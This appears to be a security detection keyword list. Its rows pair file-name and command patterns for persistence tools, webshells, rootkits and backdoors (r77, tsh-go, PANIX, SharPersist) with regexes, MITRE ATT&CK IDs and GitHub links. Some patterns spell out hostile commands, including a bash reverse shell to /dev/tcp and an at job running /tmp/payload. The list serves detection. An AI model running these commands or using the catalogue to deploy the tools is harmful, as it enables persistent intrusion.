207*/perl-reverse-shell.pl*.{0,1000}\/perl\-reverse\-shell\.pl.{0,1000}offensive_tool_keywordwebshellA collection of webshellT1505.003 - T1100 - T1190 - T1505.004TA0003 - TA0011 N/AN/APersistencehttps://github.com/Peaky-XD/webshell11N/AN/A10N/A9609
208*/persistence_demos.git*.{0,1000}\/persistence_demos\.git.{0,1000}offensive_tool_keywordpersistence_demosDemos of various (also non standard) persistence methods used by malwareT1546 - T1547 - T1133 - T1053 - T1037TA0003 N/AN/APersistencehttps://github.com/hasherezade/persistence_demos11N/AN/A73221472023-03-05T17:01:14Z2017-05-16T09:08:47Z9631
209*/Persistence-Accessibility-Features.git*.{0,1000}\/Persistence\-Accessibility\-Features\.git.{0,1000}offensive_tool_keywordPersistence-Accessibility-Featuresautomated sticky keys backdoorT1174 - T1078 - T1546.013TA0003N/AN/APersistencehttps://github.com/Ignitetechnologies/Persistence-Accessibility-Features11N/AN/A9134122020-05-18T05:59:58Z2020-05-18T05:59:23Z9633
210*/php-backdoor.php*.{0,1000}\/php\-backdoor\.php.{0,1000}offensive_tool_keywordwebshellA collection of webshellT1505.003 - T1100 - T1190 - T1505.004TA0003 - TA0011 N/AN/APersistencehttps://github.com/Peaky-XD/webshell11N/AN/A10N/A9674
211*/PoshADCS.git*.{0,1000}\/PoshADCS\.git.{0,1000}offensive_tool_keywordPoshADCSattack vectors against Active Directory by abusing Active Directory Certificate Services (ADCS)T1213.003 - T1213 - T1098.003 - T1098 - T1484.001TA0002 - TA0003 - TA0040N/AN/APersistencehttps://github.com/cfalta/PoshADCS11N/AN/A72186172021-07-07T16:47:07Z2019-10-15T15:54:03Z9774
212*/PowerLurk.git*.{0,1000}\/PowerLurk\.git.{0,1000}offensive_tool_keywordPowerlurkPowerLurk is a PowerShell toolset for building malicious WMI Event SubsriptionsT1084 - T1059.001 - T1546.003 - T1053.005TA0003 - TA0005 - TA0002 - TA0006N/AN/APersistencehttps://github.com/Sw4mpf0x/PowerLurk11N/AN/A104384722016-07-25T22:19:22Z2016-07-13T20:07:25Z9810
213*/PowerLurk.ps1*.{0,1000}\/PowerLurk\.ps1.{0,1000}offensive_tool_keywordPowerlurkPowerLurk is a PowerShell toolset for building malicious WMI Event SubsriptionsT1084 - T1059.001 - T1546.003 - T1053.005TA0003 - TA0005 - TA0002 - TA0006N/AN/APersistencehttps://github.com/Sw4mpf0x/PowerLurk11N/AN/A104384722016-07-25T22:19:22Z2016-07-13T20:07:25Z9811
214*/processhacker-*-bin.zip*.{0,1000}\/processhacker\-.{0,1000}\-bin\.zip.{0,1000}greyware_tool_keywordprocesshackerInteractions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services and process injectionT1055.001 - T1055.012 - T1003.001 - T1056.005TA0005 - TA0003 - TA0040 - TA0006 - TA0009N/AN/APersistencehttps://processhacker.sourceforge.io/11N/AN/A710N/AN/AN/AN/A9910
215*/processhacker/files/latest/download*.{0,1000}\/processhacker\/files\/latest\/download.{0,1000}greyware_tool_keywordprocesshackerInteractions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services and process injectionT1055.001 - T1055.012 - T1003.001 - T1056.005TA0005 - TA0003 - TA0040 - TA0006 - TA0009N/AN/APersistencehttps://processhacker.sourceforge.io/11N/AN/A710N/AN/AN/AN/A9911
216*/PSpersist.git*.{0,1000}\/PSpersist\.git.{0,1000}offensive_tool_keywordPspersistDropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001TA0003N/AN/APersistencehttps://github.com/TheD1rkMtr/Pspersist11N/AN/A10185242023-08-02T02:27:29Z2023-02-01T17:21:38Z9983
217*/r77-rootkit.git*.{0,1000}\/r77\-rootkit\.git.{0,1000}offensive_tool_keywordr77-rootkitFileless ring 3 rootkit with installer and persistence that hides processes, files, network connectionsT1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009TA0005 - TA0003N/AN/APersistencehttps://github.com/bytecode77/r77-rootkit11N/AN/A101018844252025-03-25T17:59:20Z2017-12-17T13:04:14Z10138
218*/r77-x64.dll*.{0,1000}\/r77\-x64\.dll.{0,1000}offensive_tool_keywordr77-rootkitFileless ring 3 rootkit with installer and persistence that hides processes, files, network connectionsT1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009TA0005 - TA0003N/AN/APersistencehttps://github.com/bytecode77/r77-rootkit11N/AN/A101018844252025-03-25T17:59:20Z2017-12-17T13:04:14Z10139
219*/r77-x86.dll*.{0,1000}\/r77\-x86\.dll.{0,1000}offensive_tool_keywordr77-rootkitFileless ring 3 rootkit with installer and persistence that hides processes, files, network connectionsT1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009TA0005 - TA0003N/AN/APersistencehttps://github.com/bytecode77/r77-rootkit11N/AN/A101018844252025-03-25T17:59:20Z2017-12-17T13:04:14Z10140
220*/RedPersist.exe*.{0,1000}\/RedPersist\.exe.{0,1000}offensive_tool_keywordRedPersistRedPersist is a Windows Persistence tool written in C#T1053 - T1547 - T1112TA0004 - TA0005 - TA0040N/AN/APersistencehttps://github.com/mertdas/RedPersist11N/AN/A103215332024-03-10T15:40:05Z2023-08-13T22:10:46Z10294
221*/RedPersist.git*.{0,1000}\/RedPersist\.git.{0,1000}offensive_tool_keywordRedPersistRedPersist is a Windows Persistence tool written in C#T1053 - T1547 - T1112TA0004 - TA0005 - TA0040N/AN/APersistencehttps://github.com/mertdas/RedPersist11N/AN/A103215332024-03-10T15:40:05Z2023-08-13T22:10:46Z10295
222*/releases/download/panix-v*/panix.sh*.{0,1000}\/releases\/download\/panix\-v.{0,1000}\/panix\.sh.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX11#linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z10342
223*/rid_hijack.py*.{0,1000}\/rid_hijack\.py.{0,1000}offensive_tool_keywordRID-HijackingWindows RID Hijacking persistence techniqueT1174TA0003N/AN/APersistencehttps://github.com/r4wd3r/RID-Hijacking11N/AN/A92174432024-11-20T01:43:01Z2018-07-14T18:48:51Z10478
224*/RID-Hijacking.git*.{0,1000}\/RID\-Hijacking\.git.{0,1000}offensive_tool_keywordRID-HijackingWindows RID Hijacking persistence techniqueT1174TA0003N/AN/APersistencehttps://github.com/r4wd3r/RID-Hijacking11N/AN/A92174432024-11-20T01:43:01Z2018-07-14T18:48:51Z10480
225*/rootkiter/Binary-files*.{0,1000}\/rootkiter\/Binary\-files.{0,1000}offensive_tool_keywordTermiteTermite rootit abused by threat actorsT1014 - T1069 - T1055TA0005 - TA0003 - TA0004Operation TunnelSnakeWhiteflyPersistencehttps://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a411N/AN/A10101561772021-01-26T23:16:49Z2019-01-03T05:01:20Z10514
226*/ropbuffers.go*.{0,1000}\/ropbuffers\.go.{0,1000}offensive_tool_keywordrulerA tool to abuse Exchange servicesT1087 - T1110 - T1133 - T1064 - T1204TA0007 - TA0006 - TA0003 - TA0002 - TA0005N/AAPT33Persistencehttps://github.com/sensepost/ruler11N/AN/A101022223622024-06-10T11:03:07Z2016-08-18T15:05:13Z10516
227*/ruler --domain *.{0,1000}\/ruler\s\-\-domain\s.{0,1000}offensive_tool_keywordrulerA tool to abuse Exchange servicesT1087 - T1110 - T1133 - T1064 - T1204TA0007 - TA0006 - TA0003 - TA0002 - TA0005N/AAPT33Persistencehttps://github.com/sensepost/ruler10N/AN/A101022223622024-06-10T11:03:07Z2016-08-18T15:05:13Z10604
228*/ruler --email *.{0,1000}\/ruler\s\-\-email\s.{0,1000}offensive_tool_keywordrulerA tool to abuse Exchange servicesT1087 - T1110 - T1133 - T1064 - T1204TA0007 - TA0006 - TA0003 - TA0002 - TA0005N/AAPT33Persistencehttps://github.com/sensepost/ruler10N/AN/A101022223622024-06-10T11:03:07Z2016-08-18T15:05:13Z10605
229*/ruler --url*.{0,1000}\/ruler\s\-\-url.{0,1000}offensive_tool_keywordrulerA tool to abuse Exchange servicesT1087 - T1110 - T1133 - T1064 - T1204TA0007 - TA0006 - TA0003 - TA0002 - TA0005N/AAPT33Persistencehttps://github.com/sensepost/ruler10N/AN/A101022223622024-06-10T11:03:07Z2016-08-18T15:05:13Z10607
230*/rulerforms.go*.{0,1000}\/rulerforms\.go.{0,1000}offensive_tool_keywordrulerA tool to abuse Exchange servicesT1087 - T1110 - T1133 - T1064 - T1204TA0007 - TA0006 - TA0003 - TA0002 - TA0005N/AAPT33Persistencehttps://github.com/sensepost/ruler11N/AN/A101022223622024-06-10T11:03:07Z2016-08-18T15:05:13Z10608
231*/Sandman.exe*.{0,1000}\/Sandman\.exe.{0,1000}offensive_tool_keywordSandmanSandman is a NTP based backdoor for red team engagements in hardened networks.T1105 - T1027 - T1071.001TA0011 - TA0005N/AN/APersistencehttps://github.com/Idov31/Sandman11N/AN/A1087851082024-03-31T17:40:15Z2022-08-21T11:04:45Z10686
232*/sandman_server.py*.{0,1000}\/sandman_server\.py.{0,1000}offensive_tool_keywordSandmanSandman is a NTP based backdoor for red team engagements in hardened networks.T1105 - T1027 - T1071.001TA0011 - TA0005N/AN/APersistencehttps://github.com/Idov31/Sandman11N/AN/A1087851082024-03-31T17:40:15Z2022-08-21T11:04:45Z10687
233*/SandmanBackdoorTimeProvider.dll*.{0,1000}\/SandmanBackdoorTimeProvider\.dll.{0,1000}offensive_tool_keywordSandmanSandman is a NTP based backdoor for red team engagements in hardened networks.T1105 - T1027 - T1071.001TA0011 - TA0005N/AN/APersistencehttps://github.com/Idov31/Sandman11N/AN/A1087851082024-03-31T17:40:15Z2022-08-21T11:04:45Z10688
234*/Sandman-master.zip*.{0,1000}\/Sandman\-master\.zip.{0,1000}offensive_tool_keywordSandmanSandman is a NTP based backdoor for red team engagements in hardened networks.T1105 - T1027 - T1071.001TA0011 - TA0005N/AN/APersistencehttps://github.com/Idov31/Sandman11N/AN/A1087851082024-03-31T17:40:15Z2022-08-21T11:04:45Z10689
235*/sbin/dropbear*.{0,1000}\/sbin\/dropbear.{0,1000}greyware_tool_keyworddropbearA smallish SSH server and clientT1021.004 - T1570TA0003N/ACOZY BEARPersistencehttps://github.com/mkj/dropbear10#linuxN/A81018514112025-03-16T12:50:35Z2013-03-19T11:15:36Z10696
236*/ScheduleRunner.git*.{0,1000}\/ScheduleRunner\.git.{0,1000}offensive_tool_keywordScheduleRunnerA C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operationT1210 - T1570 - T1021 - T1550TA0008N/AN/APersistencehttps://github.com/netero1010/ScheduleRunner11N/AN/A94336462025-01-22T02:06:59Z2021-10-12T15:27:32Z10721
237*/SchTask.zip*.{0,1000}\/SchTask\.zip.{0,1000}offensive_tool_keywordSchTask_0x727create hidden scheduled tasksT1053TA0005 - TA0003N/AN/APersistencehttps://github.com/0x727/SchTask_0x72711N/AN/A1065321122021-09-01T01:34:51Z2021-08-30T03:29:34Z10722
238*/SchTask_0x727.git*.{0,1000}\/SchTask_0x727\.git.{0,1000}offensive_tool_keywordSchTask_0x727create hidden scheduled tasksT1053TA0005 - TA0003N/AN/APersistencehttps://github.com/0x727/SchTask_0x72711N/AN/A1065321122021-09-01T01:34:51Z2021-08-30T03:29:34Z10723
239*/SchTask_0x727/*.{0,1000}\/SchTask_0x727\/.{0,1000}offensive_tool_keywordSchTask_0x727create hidden scheduled tasksT1053TA0005 - TA0003N/AN/APersistencehttps://github.com/0x727/SchTask_0x72711N/AN/A1065321122021-09-01T01:34:51Z2021-08-30T03:29:34Z10724
240*/sdb-explorer.exe*.{0,1000}\/sdb\-explorer\.exe.{0,1000}offensive_tool_keywordShimDBShim database persistence (Fin7 TTP)T1546.011TA0003N/AN/APersistencehttps://github.com/jackson5sec/ShimDB11N/AN/A9137102020-02-25T09:41:53Z2018-06-21T00:38:10Z10746
241*/Seatbelt.git*.{0,1000}\/Seatbelt\.git.{0,1000}offensive_tool_keywordseatbeltSeatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many othersT1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011N/ADispossessorPersistencehttps://github.com/GhostPack/Seatbelt11N/AN/A101040477222025-01-10T20:12:49Z2018-07-24T17:38:51Z10759
242*/Seatbelt/Commands*.{0,1000}\/Seatbelt\/Commands.{0,1000}offensive_tool_keywordseatbeltSeatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many othersT1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011N/ADispossessorPersistencehttps://github.com/GhostPack/Seatbelt11N/AN/A101040477222025-01-10T20:12:49Z2018-07-24T17:38:51Z10761
243*/SharPersist.git*.{0,1000}\/SharPersist\.git.{0,1000}offensive_tool_keywordSharPersistSharPersist Windows persistence toolkit written in C#.T1547 - T1053 - T1027 - T1028 - T1112TA0003 - TA0008N/AN/APersistencehttps://github.com/fireeye/SharPersist11N/AN/A101014602572023-08-11T00:52:09Z2019-06-21T13:32:14Z10963
244*/SharpEventPersist.git*.{0,1000}\/SharpEventPersist\.git.{0,1000}offensive_tool_keywordSharpEventPersistPersistence by writing/reading shellcode from Event LogT1055 - T1070.001 - T1547.001TA0003 - TA0005N/AN/APersistencehttps://github.com/improsec/SharpEventPersist11N/AN/A1010371502022-05-27T14:52:02Z2022-05-20T14:52:56Z10967
245*/SharpHide.git*.{0,1000}\/SharpHide\.git.{0,1000}offensive_tool_keywordSharpHideTool to create hidden registry keysT1112 - T1562 - T1562.001TA0005 - TA0003N/AN/APersistencehttps://github.com/outflanknl/SharpHide11N/AN/A95480962019-10-23T10:44:22Z2019-10-20T14:25:47Z10995
246*/SharpHide.git*.{0,1000}\/SharpHide\.git.{0,1000}offensive_tool_keywordSharpHideTool to create hidden registry keysT1112 - T1562 - T1562.001TA0005 - TA0003N/AN/APersistencehttps://github.com/outflanknl/SharpHide11N/AN/A95480962019-10-23T10:44:22Z2019-10-20T14:25:47Z10996
247*/SharpPersistSD.dll*.{0,1000}\/SharpPersistSD\.dll.{0,1000}offensive_tool_keywordSharpPersistSDA Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machinesT1547 - T1053 - T1027 - T1028 - T1112TA0003 - TA0008N/AN/APersistencehttps://github.com/cybersectroll/SharpPersistSD11N/AN/A10187122024-05-15T14:55:14Z2024-05-13T15:11:12Z11053
248*/SharpPersistSD.git*.{0,1000}\/SharpPersistSD\.git.{0,1000}offensive_tool_keywordSharpPersistSDA Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machinesT1547 - T1053 - T1027 - T1028 - T1112TA0003 - TA0008N/AN/APersistencehttps://github.com/cybersectroll/SharpPersistSD11N/AN/A10187122024-05-15T14:55:14Z2024-05-13T15:11:12Z11054
249*/SharpSC.exe*.{0,1000}\/SharpSC\.exe.{0,1000}offensive_tool_keywordSharpSC.NET assembly to interact with services. (included in powershell empire)T1543.003TA0003N/AN/APersistencehttps://github.com/djhohnstein/SharpSC11N/AN/A814062019-09-27T23:04:24Z2019-09-24T21:05:38Z11070
250*/SharpSC.git*.{0,1000}\/SharpSC\.git.{0,1000}offensive_tool_keywordSharpSC.NET assembly to interact with services. (included in powershell empire)T1543.003TA0003N/AN/APersistencehttps://github.com/djhohnstein/SharpSC11N/AN/A814062019-09-27T23:04:24Z2019-09-24T21:05:38Z11071
251*/SharpStay.git*.{0,1000}\/SharpStay\.git.{0,1000}offensive_tool_keywordSharpStaySharpStay - .NET PersistenceT1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123TA0003N/AN/APersistencehttps://github.com/0xthirteen/SharpStay11N/AN/A105475972024-06-26T15:54:52Z2020-01-24T22:22:07Z11127
252*/SharpStay/*.{0,1000}\/SharpStay\/.{0,1000}offensive_tool_keywordSharpStaySharpStay - .NET PersistenceT1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123TA0003N/AN/APersistencehttps://github.com/0xthirteen/SharpStay11N/AN/A105475972024-06-26T15:54:52Z2020-01-24T22:22:07Z11128
253*/ShimDB.git*.{0,1000}\/ShimDB\.git.{0,1000}offensive_tool_keywordShimDBShim database persistence (Fin7 TTP)T1546.011TA0003N/AN/APersistencehttps://github.com/jackson5sec/ShimDB11N/AN/A9137102020-02-25T09:41:53Z2018-06-21T00:38:10Z11231
254*/signer-exe.py*.{0,1000}\/signer\-exe\.py.{0,1000}offensive_tool_keywordPayGenFUD metasploit Persistence RATT1059.001 - T1209 - T1105 - T1547 - T1027TA0003 - TA0005 - TA0002 - TA0011N/AN/APersistencehttps://github.com/youhacker55/PayGen11N/AN/AN/A1402023-02-23T00:05:57Z2021-06-16T20:20:55Z11256
255*/simple-backdoor.php*.{0,1000}\/simple\-backdoor\.php.{0,1000}offensive_tool_keywordwebshellA collection of webshellT1505.003 - T1100 - T1190 - T1505.004TA0003 - TA0011 N/AN/APersistencehttps://github.com/Peaky-XD/webshell11N/AN/A10N/A11273
256*/stickykey.ps1*.{0,1000}\/stickykey\.ps1.{0,1000}offensive_tool_keywordPersistence-Accessibility-Featuresautomated sticky keys backdoorT1174 - T1078 - T1546.013TA0003N/AN/APersistencehttps://github.com/Ignitetechnologies/Persistence-Accessibility-Features11N/AN/A9134122020-05-18T05:59:58Z2020-05-18T05:59:23Z11672
257*/Stickykeys.sh*.{0,1000}\/Stickykeys\.sh.{0,1000}offensive_tool_keywordWinPirateautomated sticky keys backdoor + credentials harvestingT1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003TA0003 - TA0005 - TA0006N/AN/APersistencehttps://github.com/l3m0n/WinPirate11N/AN/A9113322016-07-17T20:02:07Z2016-07-18T03:40:13Z11673
258*/Suborner.git*.{0,1000}\/Suborner\.git.{0,1000}offensive_tool_keywordSubornerThe Invisible Account Forger - A simple program to create a Windows account you will only know about T1098 - T1175 - T1033TA0007 - TA0008 - TA0003N/AN/APersistencehttps://github.com/r4wd3r/Suborner11N/AN/A95469582024-11-20T01:34:44Z2022-04-26T00:12:58Z11710
259*/sunder.exe*.{0,1000}\/sunder\.exe.{0,1000}offensive_tool_keywordSunderWindows rootkit designed to work with BYOVD exploitsT1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/ColeHouston/Sunder11N/AN/A102183202025-01-18T10:41:50Z2025-01-10T03:57:05Z11715
260*/tmp/auto-priv-cgroup*.{0,1000}\/tmp\/auto\-priv\-cgroup.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linuxN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z11951
261*/tmp/auto-priv-mountdir*.{0,1000}\/tmp\/auto\-priv\-mountdir.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linuxN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z11952
262*/tmp/auto-shimpwn*.{0,1000}\/tmp\/auto\-shimpwn.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linuxN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z11953
263*/tmp/borg_d3monized*.{0,1000}\/tmp\/borg_d3monized.{0,1000}offensive_tool_keywordD3m0n1z3dShellDemonized Shell is an Advanced Tool for persistence in linuxT1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011N/AN/APersistencehttps://github.com/MatheuZSecurity/D3m0n1z3dShell10#linuxN/A104373542025-01-05T13:56:51Z2023-05-30T02:30:47Z11958
264*/tmp/dropbear*.{0,1000}\/tmp\/dropbear.{0,1000}greyware_tool_keyworddropbearA smallish SSH server and clientT1021.004 - T1570TA0003N/ACOZY BEARPersistencehttps://github.com/mkj/dropbear10#linuxN/A81018514112025-03-16T12:50:35Z2013-03-19T11:15:36Z11965
265*/tmp/evil.sh*.{0,1000}\/tmp\/evil\.sh.{0,1000}offensive_tool_keywordOWASP rulesOWASP repo of rules - extracted strings for detectionT1100 - T1505.003 - T1059.001TA0003N/AN/APersistencehttps://github.com/coreruleset/coreruleset/10#linuxN/A71025364032025-04-22T10:55:49Z2020-05-13T11:28:52Z11967
266*/tmp/tmpfolder/pingoor.c*.{0,1000}\/tmp\/tmpfolder\/pingoor\.c.{0,1000}offensive_tool_keywordD3m0n1z3dShellDemonized Shell is an Advanced Tool for persistence in linuxT1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011N/AN/APersistencehttps://github.com/MatheuZSecurity/D3m0n1z3dShell10#linuxN/A104373542025-01-05T13:56:51Z2023-05-30T02:30:47Z12000
267*/tmp/tmpfolder/pingoor.h*.{0,1000}\/tmp\/tmpfolder\/pingoor\.h.{0,1000}offensive_tool_keywordD3m0n1z3dShellDemonized Shell is an Advanced Tool for persistence in linuxT1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011N/AN/APersistencehttps://github.com/MatheuZSecurity/D3m0n1z3dShell10#linuxN/A104373542025-01-05T13:56:51Z2023-05-30T02:30:47Z12001
268*/tmp/tshd*.{0,1000}\/tmp\/tshd.{0,1000}offensive_tool_keywordtshUNIX backdoorT1103 - T1105 - T1160 - T1189 - T1496 - T1102TA0003 - TA0005 - TA0011N/AN/APersistencehttps://github.com/creaktive/tsh10#linuxN/A1065681302024-02-20T18:07:08Z2011-05-14T19:15:00Z12004
269*/tomcat-RH-root.sh*.{0,1000}\/tomcat\-RH\-root\.sh.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK11#linuxN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z12028
270*/tsh_linux_amd64*.{0,1000}\/tsh_linux_amd64.{0,1000}offensive_tool_keywordtsh-goTiny SHell Go - An open-source backdoor written in GoT1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009TA0003 - TA0005 - TA0011 - TA0010N/AN/APersistencehttps://github.com/CykuTW/tsh-go11#linuxN/A102161162024-08-29T02:59:37Z2022-06-13T16:25:30Z12109
271*/tsh_windows_amd64.exe*.{0,1000}\/tsh_windows_amd64\.exe.{0,1000}offensive_tool_keywordtsh-goTiny SHell Go - An open-source backdoor written in GoT1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009TA0003 - TA0005 - TA0011 - TA0010N/AN/APersistencehttps://github.com/CykuTW/tsh-go11N/AN/A102161162024-08-29T02:59:37Z2022-06-13T16:25:30Z12110
272*/tshd.go*.{0,1000}\/tshd\.go.{0,1000}offensive_tool_keywordtsh-goTiny SHell Go - An open-source backdoor written in GoT1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009TA0003 - TA0005 - TA0011 - TA0010N/AN/APersistencehttps://github.com/CykuTW/tsh-go10#linuxN/A102161162024-08-29T02:59:37Z2022-06-13T16:25:30Z12111
273*/tshd_linux_amd64*.{0,1000}\/tshd_linux_amd64.{0,1000}offensive_tool_keywordtsh-goTiny SHell Go - An open-source backdoor written in GoT1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009TA0003 - TA0005 - TA0011 - TA0010N/AN/APersistencehttps://github.com/CykuTW/tsh-go11#linuxN/A102161162024-08-29T02:59:37Z2022-06-13T16:25:30Z12112
274*/tshd_windows.go*.{0,1000}\/tshd_windows\.go.{0,1000}offensive_tool_keywordtsh-goTiny SHell Go - An open-source backdoor written in GoT1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009TA0003 - TA0005 - TA0011 - TA0010N/AN/APersistencehttps://github.com/CykuTW/tsh-go11N/AN/A102161162024-08-29T02:59:37Z2022-06-13T16:25:30Z12113
275*/tshd_windows_amd64.exe*.{0,1000}\/tshd_windows_amd64\.exe.{0,1000}offensive_tool_keywordtsh-goTiny SHell Go - An open-source backdoor written in GoT1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009TA0003 - TA0005 - TA0011 - TA0010N/AN/APersistencehttps://github.com/CykuTW/tsh-go11N/AN/A102161162024-08-29T02:59:37Z2022-06-13T16:25:30Z12114
276*/tsh-go.git*.{0,1000}\/tsh\-go\.git.{0,1000}offensive_tool_keywordtsh-goTiny SHell Go - An open-source backdoor written in GoT1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009TA0003 - TA0005 - TA0011 - TA0010N/AN/APersistencehttps://github.com/CykuTW/tsh-go11N/AN/A102161162024-08-29T02:59:37Z2022-06-13T16:25:30Z12115
277*/UnstoppableService.git*.{0,1000}\/UnstoppableService\.git.{0,1000}offensive_tool_keywordUnstoppableServicea Windows service in C# that is self installing as a single executable and sets proper attributes to prevent an administrator from stopping or pausing the service through the Windows Service Control Manager interfaceT1543.003 - T1564.001 - T1490TA0003 - TA0005N/AN/APersistencehttps://github.com/malcomvetter/UnstoppableService11N/AN/A5166152019-01-19T22:38:18Z2018-08-07T22:11:22Z12238
278*/Use-Waitfor.exe*.{0,1000}\/Use\-Waitfor\.exe.{0,1000}offensive_tool_keywordWaitfor-PersistenceUse Waitfor.exe to maintain persistenceT1059 - T1117 - T1053.005 - T1546.013TA0002 - TA0003N/AN/APersistencehttps://github.com/3gstudent/Waitfor-Persistence11N/AN/A9154192021-04-17T01:41:42Z2017-06-07T09:33:13Z12260
279*/usr/bin/at -M -f /tmp/payload*.{0,1000}\/usr\/bin\/at\s\-M\s\-f\s\/tmp\/payload.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z12263
280*/usr/bin/at -M -f /usr/bin/atest*.{0,1000}\/usr\/bin\/at\s\-M\s\-f\s\/usr\/bin\/atest.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z12264
281*/usr/bin/bash -c 'bash -i >& /dev/tcp/$ip/$port 0>&1*.{0,1000}\/usr\/bin\/bash\s\-c\s\'bash\s\-i\s\>\&\s\/dev\/tcp\/\$ip\/\$port\s0\>\&1.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z12265
282*/usr/local/bin/escape.sh*.{0,1000}\/usr\/local\/bin\/escape\.sh.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z12348
